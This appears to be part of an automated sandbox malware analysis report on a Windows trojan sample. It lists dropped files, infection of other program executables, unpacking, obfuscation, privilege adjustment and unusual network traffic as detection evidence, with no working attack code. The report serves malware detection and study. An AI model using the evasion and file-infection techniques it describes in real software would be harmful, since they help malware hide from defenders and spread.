Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@5/11@1/2

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F4119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_00F4119F

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

0_2_004019F0

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2920

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

File created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Command line argument: 08A

0_2_00413780

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe "C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe"
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe C:\Users\user\AppData\Local\Temp\IoUNtL.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1556
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.00000000006FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32^ source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: `C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source:	Binary string: System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004D38000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbW.: source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbu source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Unpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;u:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Unpacked PE file: 1.2.IoUNtL.exe.f40000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Unpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: u

PE file contains sections with non-standard names

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Static PE information: section name: u
Source: IoUNtL.exe.0.dr	Static PE information: section name: .aspack
Source: IoUNtL.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0041C40C push cs; iretd	0_2_0041C4E2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00423149 push eax; ret	0_2_00423179
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0041C50E push cs; iretd	0_2_0041C4E2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_004231C8 push eax; ret	0_2_00423179
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0040E21D push ecx; ret	0_2_0040E230
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0041C6BE push ebx; ret	0_2_0041C6BF
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0062C10E push ebx; ret	0_2_0062C10F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0061E46D push ecx; ret	0_2_0061E480
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0062BE5C push cs; iretd	0_2_0062BF32
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0062BF5E push cs; iretd	0_2_0062BF32
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006938C5 push ecx; iretd	0_2_006938C8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00690A87 push FFFFFFE1h; ret	0_2_00690A96
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006939D2 push edi; retf	0_2_006939D3
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_021D62D0 push ds; iretd	0_2_021D62DF
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_021D52CC push es; iretd	0_2_021D52CF
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060644A0 pushfd ; iretd	0_2_06064789
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_06064852 push es; ret	0_2_06064860
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060657D0 push 0C0603D8h; retf	0_2_0606582D
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A78B0 push es; ret	0_2_060A78C0
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F46076 push 00F414E1h; ret	1_2_00F46425
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F41638 push dword ptr [00F43084h]; ret	1_2_00F4170E
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F42D9B push ecx; ret	1_2_00F42DAB
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F4600A push ebp; ret	1_2_00F4600D

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Static PE information: section name: u entropy: 6.934487792037011
Source: IoUNtL.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.935083153445225
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.934720431366084
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.933665407742621

Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	File created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49704 -> 799

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
